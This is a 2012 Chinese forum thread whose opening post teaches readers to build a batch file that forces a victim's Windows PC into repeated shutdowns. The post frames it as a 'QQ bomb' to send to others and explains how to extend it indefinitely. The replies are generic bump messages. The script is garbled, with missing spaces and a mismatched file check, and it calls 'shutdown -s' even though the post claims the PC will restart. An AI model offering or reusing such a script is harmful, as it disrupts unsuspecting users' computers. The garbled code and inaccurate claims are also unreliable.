edit_note帖子
154
stars积分
72,053
event加入
2011-10-22
电脑网络
[教程]教你让对方电脑,无限重启!
schedule发表于 2012-09-08 21:28:00
visibility查看 6,386
chat_bubble回复 483
#1 楼主
教大家一个非常简单的bat文件使用,这里可以当成QQ炸弹用。*以下的代码,如果你让对方点击了,他的电脑会连续重启5次。不信可以自己制作完点击试一下*此方法非常简单,复制以下代码到记事本:*@echo off*ifnot exist c:\1.txt echo.>c:\1.txt&gotoerr1*if not exist c:\2.txt echo.>c:\2.txt&goto err1*if not exist c:\3.txt echo.>c:\3.txt&goto err1*if not exist c:\4.txtecho.>c:\4.txt&goto err1*if not exist c:\5.txt echo.>c:\5.txt&goto err1*if not existc:\5.txt echo.>c:\6.txt&goto err1*gotoerr2*:err1*shutdown -s -t 0*:err2*复制完以后,保存到记事本,把记事本文件更改为.bat后缀的文件。
如果你想让对方连续重新启动,那就无限的增加下去,如在“ifnotexist c:\5.txt echo.>c:\5.txt&gotoerr1”后面增加“if notexist c:\5.txt echo.>c:\6.txt&goto err1”不要过分哦!
如果你想让对方连续重新启动,那就无限的增加下去,如在“ifnotexist c:\5.txt echo.>c:\5.txt&gotoerr1”后面增加“if notexist c:\5.txt echo.>c:\6.txt&goto err1”不要过分哦!
全部回复 (483)
2012-09-09 21:38:00
#22
看帖回帖是美德!
2012-09-09 22:34:00
#23
支持你!
2012-09-09 23:54:00
#24
看帖回帖是美德!
2012-09-10 04:30:00
#25
好帖,要顶!
2012-09-10 20:17:00
#26
你牛,我顶!
2012-09-11 08:04:00
#27
这帖不错,该顶!
2012-09-15 00:32:00
#28
好帖,要顶!
2012-09-15 18:14:00
#29
支持你!
2012-09-15 18:20:00
#30
你牛,我顶!
2012-09-22 15:02:00
#31
这帖不错,该顶!
2012-09-22 20:41:00
#32
你牛,我顶!
2012-09-23 14:01:00
#33
你牛,我顶!
2012-09-25 17:51:00
#34
看帖回帖是美德!
2012-09-25 23:10:00
#35
你牛,我顶!
2012-09-27 09:42:00
#36
看帖回帖是美德
2012-09-27 11:37:00
#37
看帖回帖是美德!
2012-09-27 13:25:00
#38
好帖要顶!
2012-09-27 16:23:00
#39
好帖,要顶!
2012-09-27 16:56:00
#40
你牛,我顶!
2012-09-27 20:47:00
#41
这帖不错,该顶!刘翔实
登录 后才能回复
flag举报帖子